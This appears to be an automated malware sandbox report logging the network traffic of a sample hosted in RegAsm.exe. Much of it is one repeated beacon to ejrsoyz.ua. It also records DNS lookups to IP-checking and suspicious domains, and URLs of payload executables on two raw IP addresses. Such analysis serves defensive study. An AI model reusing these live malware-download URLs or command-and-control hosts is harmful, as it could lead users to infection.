Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic DNS traffic detected: DNS query: api64.ipify.org
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: marafon.in
Source: global traffic DNS traffic detected: DNS query: cdn.discordapp.com
Source: global traffic DNS traffic detected: DNS query: fivevh5pt.top
Source: global traffic DNS traffic detected: DNS query: iplog.co
Source: global traffic DNS traffic detected: DNS query: ghostreedmnu.shop
Source: global traffic DNS traffic detected: DNS query: ejrsoyz.ua
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ghostreedmnu.shop
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Sep 2024 22:53:21 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Content-Type: text/html; charset=iso-8859-1
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Sep 2024 22:53:22 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Content-Type: text/html; charset=iso-8859-1
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Sep 2024 22:53:22 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Content-Length: 301Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 30 33 2e 31 33 30 2e 31 34 37 2e 32 31 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 103.130.147.211 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Sep 2024 22:53:27 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Content-Length: 301Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 30 33 2e 31 33 30 2e 31 34 37 2e 32 31 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 103.130.147.211 Port 80</address></body></html>
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1690067906.0000000003FA2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/Channel2.exe
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/Channel2.exeC:
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/Channel2.exeDBK7bm
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/Channel2.exel
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/CheckTool.exe
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/CheckTool.exe8
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/CheckTool.exeC:
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/CheckTool.exeK
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/Silencer.exe
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/Silencer.exe/
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/Silencer.exeC:
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/tac.exe
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/tac.exeC:
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/tac.exeW
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.95/thebig/stories.exe
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.95/thebig/stories.exeC:
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.95/thebig/stories.exeISelAiW
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.95/thebig/stories.exeS/s9MlP
